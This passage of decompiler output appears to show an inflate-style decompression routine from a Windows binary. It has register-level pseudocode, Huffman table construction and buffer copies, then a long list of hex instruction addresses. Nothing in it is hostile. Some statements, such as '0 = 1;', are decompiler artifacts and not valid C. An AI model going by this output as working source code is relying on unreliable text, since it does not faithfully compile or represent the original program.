																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42ca38, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42ca38 + _t440;
														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
														 *0x42dbb8 =  *0x42dbb8 + 1;
														__eflags =  *0x42dbb8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                            0x00406354
                                            0x00406354
                                            0x00406354
                                            0x00406354
                                            0x00406354
                                            0x00406358
                                            0x00000000
                                            0x00000000
                                            0x0040635e
                                            0x0040635e
                                            0x00406361
                                            0x00406364
                                            0x00406369
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406374
                                            0x00406374
                                            0x00406377
                                            0x00000000
                                            0x00000000
                                            0x00406379
                                            0x00406379
                                            0x0040637c
                                            0x00406381
                                            0x00406383
                                            0x00406386
                                            0x0040638c
                                            0x004060eb
                                            0x004060eb
                                            0x004060ee
                                            0x004060f4
                                            0x004060fa
                                            0x00406103
                                            0x00406109
                                            0x0040610c
                                            0x00406113
                                            0x00406118
                                            0x0040611e
                                            0x00406129
                                            0x00406129
                                            0x00406392
                                            0x00406392
                                            0x0040639c
                                            0x00000000
                                            0x00000000
                                            0x004063a2
                                            0x004063a2
                                            0x004063a6
                                            0x004063a9
                                            0x004063a9
                                            0x004063ad
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x004063b9
                                            0x004063bf
                                            0x00000000
                                            0x00000000
                                            0x004063c1
                                            0x004063e3
                                            0x004063e3
                                            0x004063e6
                                            0x00000000
                                            0x00000000
                                            0x004063c3
                                            0x004063c7
                                            0x00000000
                                            0x00000000
                                            0x004063cd
                                            0x004063cd
                                            0x004063d0
                                            0x004063d3
                                            0x004063d8
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e0
                                            0x004063e8
                                            0x004063e8
                                            0x004063ee
                                            0x004063f1
                                            0x004063f4
                                            0x004063f4
                                            0x004063fb
                                            0x004063ff
                                            0x00406403
                                            0x00406406
                                            0x00406409
                                            0x0040640f
                                            0x00406414
                                            0x00000000
                                            0x00000000
                                            0x00406416
                                            0x0040642a
                                            0x0040642a
                                            0x0040642e
                                            0x00000000
                                            0x00000000
                                            0x00406418
                                            0x0040641b
                                            0x0040641b
                                            0x00406422
                                            0x00406427
                                            0x00406427
                                            0x00406427
                                            0x00406430
                                            0x00406430
                                            0x00406433
                                            0x00406441
                                            0x00406447
                                            0x0040644c
                                            0x00406452
                                            0x00406458
                                            0x0040645e
                                            0x00406465
                                            0x00406479
                                            0x00406479
                                            0x00406a48
                                            0x00406a48
                                            0x00406a48
                                            0x00406a4d
                                            0x00000000
                                            0x00000000
                                            0x00406085
                                            0x00406085
                                            0x00000000
                                            0x00406680
                                            0x00406680
                                            0x00406684
                                            0x00406687
                                            0x0040668a
                                            0x0040668d
                                            0x00000000
                                            0x00000000
                                            0x00406693
                                            0x00406693
                                            0x004066b8
                                            0x004066b8
                                            0x004066b8
                                            0x004066ba
                                            0x00000000
                                            0x00000000
                                            0x00406698
                                            0x00406698
                                            0x0040669c
                                            0x00000000
                                            0x00000000
                                            0x004066a2
                                            0x004066a2
                                            0x004066a5
                                            0x004066a8
                                            0x004066ab
                                            0x004066ad
                                            0x004066af
                                            0x004066b2
                                            0x004066b5
                                            0x004066b5
                                            0x004066b5
                                            0x004066bc
                                            0x004066bc
                                            0x004066c4
                                            0x004066c7
                                            0x004066ca
                                            0x004066cd
                                            0x004066d1
                                            0x004066d4
                                            0x004066d6
                                            0x004066d9
                                            0x004066db
                                            0x004066ef
                                            0x004066ef
                                            0x004066f2
                                            0x0040670c
                                            0x0040670c
                                            0x0040670f
                                            0x00000000
                                            0x00000000
                                            0x00406715
                                            0x00406715
                                            0x00406718
                                            0x00000000
                                            0x00000000
                                            0x0040671e
                                            0x0040671e
                                            0x00000000
                                            0x0040671e
                                            0x004066f4
                                            0x004066f7
                                            0x004066fe
                                            0x00406701
                                            0x00000000
                                            0x00406701
                                            0x004066dd
                                            0x004066e1
                                            0x004066e4
                                            0x00000000
                                            0x00000000
                                            0x00406729
                                            0x00406729
                                            0x0040674e
                                            0x0040674e
                                            0x0040674e
                                            0x00406750
                                            0x00000000
                                            0x00000000
                                            0x0040672e
                                            0x0040672e
                                            0x00406732
                                            0x00000000
                                            0x00000000
                                            0x00406738
                                            0x00406738
                                            0x0040673b
                                            0x0040673e
                                            0x00406741
                                            0x00406743
                                            0x00406745
                                            0x00406748
                                            0x0040674b
                                            0x0040674b
                                            0x0040674b
                                            0x00406752
                                            0x0040675a
                                            0x0040675d
                                            0x00406760
                                            0x00406762
                                            0x00406765
                                            0x00406765
                                            0x00406767
                                            0x0040676b
                                            0x0040676e
                                            0x00406771
                                            0x00406774
                                            0x00000000
                                            0x00000000
                                            0x0040677a
                                            0x0040677a
                                            0x0040679f
                                            0x0040679f
                                            0x0040679f
                                            0x004067a1
                                            0x00000000
                                            0x00000000
                                            0x0040677f
                                            0x0040677f
                                            0x00406783
                                            0x00000000
                                            0x00000000
                                            0x00406789
                                            0x00406789
                                            0x0040678c
                                            0x0040678f
                                            0x00406792
                                            0x00406794
                                            0x00406796
                                            0x00406799
                                            0x0040679c
                                            0x0040679c
                                            0x0040679c
                                            0x004067a3
                                            0x004067a3
                                            0x004067ab
                                            0x004067ae
                                            0x004067b1
                                            0x004067b4
                                            0x004067b8
                                            0x004067bb
                                            0x004067bd
                                            0x004067c0
                                            0x004067c3
                                            0x004067dd
                                            0x004067dd
                                            0x004067e0
                                            0x00000000
                                            0x00000000
                                            0x004067e6
                                            0x004067e6
                                            0x004067e9
                                            0x004067f0
                                            0x00000000
                                            0x004067f0
                                            0x004067c5
                                            0x004067c8
                                            0x004067cf
                                            0x004067d2
                                            0x00000000
                                            0x00000000
                                            0x004067f8
                                            0x004067f8
                                            0x0040681d
                                            0x0040681d
                                            0x0040681d
                                            0x0040681f
                                            0x00000000
                                            0x00000000
                                            0x004067fd
                                            0x004067fd
                                            0x00406801
                                            0x00000000
                                            0x00000000
                                            0x00406807
                                            0x00406807
                                            0x0040680a
                                            0x0040680d
                                            0x00406810
                                            0x00406812
                                            0x00406814
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681a
                                            0x00406821
                                            0x00406829
                                            0x0040682c
                                            0x0040682f
                                            0x00406831
                                            0x00406834
                                            0x00406834
                                            0x00406836
                                            0x00000000
                                            0x00000000
                                            0x0040683c
                                            0x0040683c
                                            0x0040683f
                                            0x00406844
                                            0x00406846
                                            0x0040684c
                                            0x0040684e
                                            0x00406863
                                            0x00406865
                                            0x00406865
                                            0x00406850
                                            0x00406856
                                            0x00406858
                                            0x0040685a
                                            0x0040685a
                                            0x00406867
                                            0x0040686b
                                            0x0040686e
                                            0x00406874
                                            0x00406874
                                            0x00406877
                                            0x00406877
                                            0x00406877
                                            0x00406879
                                            0x00000000
                                            0x00000000
                                            0x0040687f
                                            0x0040687f
                                            0x00406885
                                            0x00406887
                                            0x004068ac
                                            0x004068af
                                            0x004068b5
                                            0x004068ba
                                            0x004068c0
                                            0x004068c6
                                            0x004068c8
                                            0x004068cb
                                            0x004068d4
                                            0x004068da
                                            0x004068da
                                            0x004068cd
                                            0x004068cf
                                            0x004068d1
                                            0x004068d1
                                            0x004068dc
                                            0x004068e2
                                            0x004068e4
                                            0x004068e7
                                            0x004068e9
                                            0x004068ef
                                            0x004068f1
                                            0x004068f3
                                            0x004068f5
                                            0x004068f7
                                            0x004068fa
                                            0x00406903
                                            0x00406906
                                            0x00406906
                                            0x004068fc
                                            0x004068fc
                                            0x004068ff
                                            0x004068ff
                                            0x004068fa
                                            0x004068f1
                                            0x00406908
                                            0x0040690a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040690a
                                            0x00406889
                                            0x00406889
                                            0x0040688f
                                            0x00406895
                                            0x00406897
                                            0x00000000
                                            0x00000000
                                            0x00406899
                                            0x00406899
                                            0x0040689b
                                            0x0040689d
                                            0x004068a6
                                            0x004068a6
                                            0x0040689f
                                            0x0040689f
                                            0x004068a2
                                            0x004068a2
                                            0x004068a8
                                            0x004068aa
                                            0x00000000
                                            0x00000000
                                            0x00406910
                                            0x00406910
                                            0x00406915
                                            0x00406917
                                            0x00406918
                                            0x00406919
                                            0x0040691a
                                            0x00406920
                                            0x00406923
                                            0x00406926
                                            0x00406929
                                            0x0040692b
                                            0x00406931
                                            0x00406931
                                            0x00406934
                                            0x00406934
                                            0x00406934
                                            0x00406934
                                            0x0040693d
                                            0x00000000
                                            0x00000000
                                            0x00406942
                                            0x00406942
                                            0x00406945
                                            0x00406948
                                            0x0040694a
                                            0x004069e1
                                            0x004069e1
                                            0x004069e4
                                            0x004069e6
                                            0x004069e7
                                            0x004069e8
                                            0x004069eb
                                            0x00000000
                                            0x004069eb
                                            0x00406950
                                            0x00406950
                                            0x00406956
                                            0x00406958
                                            0x0040697d
                                            0x00406980
                                            0x00406986
                                            0x0040698b
                                            0x00406991
                                            0x00406997
                                            0x00406999
                                            0x0040699c
                                            0x004069a5
                                            0x004069ab
                                            0x004069ab
                                            0x0040699e
                                            0x004069a0
                                            0x004069a2
                                            0x004069a2
                                            0x004069ad
                                            0x004069b3
                                            0x004069b5
                                            0x004069b8
                                            0x004069ba
                                            0x004069c0
                                            0x004069c2
                                            0x004069c4
                                            0x004069c6
                                            0x004069c8
                                            0x004069cb
                                            0x004069d4
                                            0x004069d7
                                            0x004069d7
                                            0x004069cd
                                            0x004069cd
                                            0x004069d0
                                            0x004069d0
                                            0x004069cb
                                            0x004069c2
                                            0x004069d9
                                            0x004069db
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004069db
                                            0x0040695a
                                            0x0040695a
                                            0x00406960
                                            0x00406966
                                            0x00406968
                                            0x00000000
                                            0x00000000
                                            0x0040696a
                                            0x0040696a
                                            0x0040696c
                                            0x0040696e
                                            0x00406975
                                            0x00406975
                                            0x00406977
                                            0x00406970
                                            0x00406970
                                            0x00406972
                                            0x00406972
                                            0x00406979
                                            0x0040697b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004069f3
                                            0x004069f3
                                            0x004069f6
                                            0x004069f8
                                            0x004069fb
                                            0x004069fe
                                            0x004069fe
                                            0x004069fe
                                            0x004069fe
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004060ac
                                            0x00406090
                                            0x00000000
                                            0x00406096
                                            0x00406099
                                            0x004060a3
                                            0x004060a6
                                            0x004060a9
                                            0x00000000
                                            0x004060a9
                                            0x00406090
                                            0x004060b4
                                            0x004060b7
                                            0x004060bb
                                            0x004060c5
                                            0x004060cf
                                            0x004060d2
                                            0x004060d8
                                            0x0040620c
                                            0x0040620e
                                            0x00406214
                                            0x00406217
                                            0x0040621a
                                            0x00000000
                                            0x0040621a
                                            0x004060de
                                            0x004060de
                                            0x004060df
                                            0x00406137
                                            0x00406137
                                            0x0040613e
                                            0x004061e4
                                            0x004061e4
                                            0x004061e9
                                            0x004061ec
                                            0x004061f1
                                            0x004061f4
                                            0x004061f9
                                            0x004061fc
                                            0x00406201
                                            0x00406204
                                            0x00406204
                                            0x00000000
                                            0x00406144
                                            0x00406144
                                            0x00406144
                                            0x00406144
                                            0x00406148
                                            0x00406148
                                            0x0040616a
                                            0x0040616d
                                            0x0040616f
                                            0x00406172
                                            0x00406177
                                            0x0040614d
                                            0x0040614d
                                            0x00406152
                                            0x00406154
                                            0x00406156
                                            0x0040615b
                                            0x00406161
                                            0x00406166
                                            0x00406168
                                            0x00406168
                                            0x0040615d
                                            0x0040615d
                                            0x0040615d
                                            0x0040615b
                                            0x00000000
                                            0x00406179
                                            0x004061a6
                                            0x004061ab
                                            0x004061ad
                                            0x004061ae
                                            0x004061b0
                                            0x004061b1
                                            0x004061b1
                                            0x004061b1
                                            0x004061d9
                                            0x004061de
                                            0x004061de
                                            0x00000000
                                            0x004061de
                                            0x00406177
                                            0x0040613e
                                            0x004060e1
                                            0x004060e1
                                            0x004060e2
                                            0x0040612c
                                            0x00000000
                                            0x0040612c
                                            0x004060e4
                                            0x004060e5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406241
                                            0x00406241
                                            0x00406241
                                            0x00406244
                                            0x00000000
                                            0x00000000
                                            0x00406221
                                            0x00406221
                                            0x00406225
                                            0x00000000
                                            0x00000000
                                            0x0040622b
                                            0x0040622b
                                            0x0040622e
                                            0x00406231
                                            0x00406236
                                            0x00406238
                                            0x0040623b
                                            0x0040623e
                                            0x0040623e
                                            0x0040623e
                                            0x00406246
                                            0x00406246
                                            0x00406249
                                            0x0040624b
                                            0x00406250
                                            0x00406253
                                            0x00406255
                                            0x00406258
                                            0x00000000
                                            0x00000000
                                            0x0040625e
                                            0x0040625e
                                            0x00406260
                                            0x00000000
                                            0x00000000
                                            0x00406266
                                            0x00406266
                                            0x0040626a
                                            0x00000000
                                            0x00000000
                                            0x00406270
                                            0x00406270
                                            0x00406273
                                            0x00406275
                                            0x00406313
                                            0x00406313
                                            0x00406316
                                            0x00406318
                                            0x00406318
                                            0x0040631b
                                            0x0040631e
                                            0x00406320
                                            0x00406322
                                            0x00406324
                                            0x00406324
                                            0x0040632d
                                            0x00406332
                                            0x00406335
                                            0x00406338
                                            0x0040633b
                                            0x0040633e
                                            0x0040633e
                                            0x0040633e
                                            0x00406341
                                            0x00406347
                                            0x00406347
                                            0x0040634d
                                            0x0040634d
                                            0x0040634d
                                            0x00000000
                                            0x00406341
                                            0x0040627b
                                            0x0040627b
                                            0x00406281
                                            0x00406284
                                            0x00406286
                                            0x004062b1
                                            0x004062b4
                                            0x004062ba
                                            0x004062bf
                                            0x004062c5
                                            0x004062cb
                                            0x004062cd
                                            0x004062d0
                                            0x004062d9
                                            0x004062df
                                            0x004062df
                                            0x004062d2
                                            0x004062d4
                                            0x004062d6
                                            0x004062d6
                                            0x004062e1
                                            0x004062e7
                                            0x004062ea
                                            0x004062ec
                                            0x004062ee
                                            0x004062f4
                                            0x004062f6
                                            0x004062f8
                                            0x004062fb
                                            0x00406304
                                            0x00406304
                                            0x00406306
                                            0x004062fd
                                            0x004062fd
                                            0x00406300
                                            0x00406300
                                            0x00406308
                                            0x00406308
                                            0x004062f6
                                            0x0040630b
                                            0x0040630d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040630d
                                            0x00406288
                                            0x00406288
                                            0x0040628e
                                            0x00406294
                                            0x00406296
                                            0x00000000
                                            0x00000000
                                            0x00406298
                                            0x00406298
                                            0x0040629a
                                            0x0040629c
                                            0x0040629f
                                            0x004062a6
                                            0x004062a6
                                            0x004062a8
                                            0x004062a1
                                            0x004062a1
                                            0x004062a3
                                            0x004062a3
                                            0x004062aa
                                            0x004062ac
                                            0x004062af
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004063b3
                                            0x004063b6
                                            0x004063b9
                                            0x004063bf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406596
                                            0x00406596
                                            0x00406596
                                            0x00406599
                                            0x0040659c
                                            0x0040659e
                                            0x004065a1
                                            0x004065a7
                                            0x004065ae
                                            0x004065b0
                                            0x00000000
                                            0x00000000
                                            0x00406484
                                            0x00406484
                                            0x004064ac
                                            0x004064ac
                                            0x004064ac
                                            0x004064ae
                                            0x00000000
                                            0x00000000
                                            0x0040648c
                                            0x0040648c
                                            0x00406490
                                            0x00000000
                                            0x00000000
                                            0x00406496
                                            0x00406496
                                            0x00406499
                                            0x0040649c
                                            0x0040649f
                                            0x004064a1
                                            0x004064a3
                                            0x004064a6
                                            0x004064a9
                                            0x004064a9
                                            0x004064a9
                                            0x004064b0
                                            0x004064b0
                                            0x004064b8
                                            0x004064bb
                                            0x004064c1
                                            0x004064c4
                                            0x004064c8
                                            0x004064cc
                                            0x004064cf
                                            0x004064d2
                                            0x004064ea
                                            0x004064ea
                                            0x004064ed
                                            0x004064fb
                                            0x004064fe
                                            0x004064ef
                                            0x004064ef
                                            0x004064f1
                                            0x004064f8
                                            0x004064f8
                                            0x00406527
                                            0x00406527
                                            0x00406527
                                            0x0040652a
                                            0x0040652c
                                            0x00000000
                                            0x00000000
                                            0x00406507
                                            0x00406507
                                            0x0040650b
                                            0x00000000
                                            0x00000000
                                            0x00406511
                                            0x00406511
                                            0x00406514
                                            0x00406517
                                            0x0040651a
                                            0x0040651c
                                            0x0040651e
                                            0x00406521
                                            0x00406524
                                            0x00406524
                                            0x00406524
                                            0x0040652e
                                            0x0040652e
                                            0x00406530
                                            0x00406532
                                            0x0040653d
                                            0x00406540
                                            0x00406543
                                            0x00406545
                                            0x00406547
                                            0x00406549
                                            0x0040654c
                                            0x0040654f
                                            0x00406554
                                            0x00406557
                                            0x0040655a
                                            0x0040655d
                                            0x00406564
                                            0x00406567
                                            0x00406569
                                            0x00000000
                                            0x00000000
                                            0x0040656f
                                            0x0040656f
                                            0x00406573
                                            0x00406584
                                            0x00406584
                                            0x00406584
                                            0x00406586
                                            0x00406586
                                            0x0040658a
                                            0x0040658a
                                            0x0040658a
                                            0x0040658c
                                            0x0040658d
                                            0x00406590
                                            0x00406590
                                            0x00406590
                                            0x00406593
                                            0x00000000
                                            0x00406593
                                            0x00406575
                                            0x00406575
                                            0x00406578
                                            0x00000000
                                            0x00000000
                                            0x0040657e
                                            0x0040657e
                                            0x00000000
                                            0x0040657e
                                            0x004064d4
                                            0x004064d4
                                            0x004064d6
                                            0x004064d8
                                            0x004064db
                                            0x004064de
                                            0x004064e2
                                            0x004064e2
                                            0x004065b6
                                            0x004065b6
